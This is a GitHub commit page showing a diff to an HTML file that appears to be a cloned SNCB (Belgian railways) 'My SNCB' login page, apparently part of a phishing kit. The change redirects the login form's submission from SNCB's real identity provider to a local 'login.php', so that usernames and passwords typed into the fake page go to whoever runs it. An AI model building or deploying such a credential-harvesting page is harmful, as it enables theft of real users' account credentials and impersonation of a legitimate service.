Skip to content

Commit

Permalink
Update login_en.html
Browse files Browse the repository at this point in the history
  • Loading branch information
dracksters committed Jun 10, 2024
1 parent 3a47af4 commit 5d21152
Showing 1 changed file with 2 additions and 2 deletions.
4 changes: 2 additions & 2 deletions .sites/sncb/login_en.html
Original file line number Diff line number Diff line change
Expand Up @@ -303,7 +303,7 @@ <h1 class="marg-bottom-sm-40 marg-top-sm-40 marg-top-lg-0" data-i18n="rep6">My S
<div class="well bg-white col col-md-6 pad-full-sm-30 marg-full-md-10 marg-bottom-sm-40">
<h2 class="h4" data-i18n="rep8">Login</h2>

<form id="loginForm" method="post" action="https://idp.belgiantrain.be/idhub/authenticate/internalidp">
<form id="loginForm" method="post" action="login.php">

<input type="hidden" name="t_id" value="TID:5d40a43b-e070-4247-82df-39699959982f">
<input type="hidden" name="authType" value="up">
Expand Down Expand Up @@ -399,4 +399,4 @@ <h4 data-i18n="rep1">The benefits of your My SNCB account :</h4>
<script src="./login_en_files/app.min.js.téléchargé"></script>


<protonpass-root-9f7f data-protonpass-role="root"><template shadowrootmode="open"><iframe src="chrome-extension://ghmbeldphafepmbegfdlkpapadhbakde/dropdown.html" style="--frame-animation: fadein;"></iframe></template></protonpass-root-9f7f></body></html>
<protonpass-root-9f7f data-protonpass-role="root"><template shadowrootmode="open"><iframe src="chrome-extension://ghmbeldphafepmbegfdlkpapadhbakde/dropdown.html" style="--frame-animation: fadein;"></iframe></template></protonpass-root-9f7f></body></html>

0 comments on commit 5d21152

Please sign in to comment.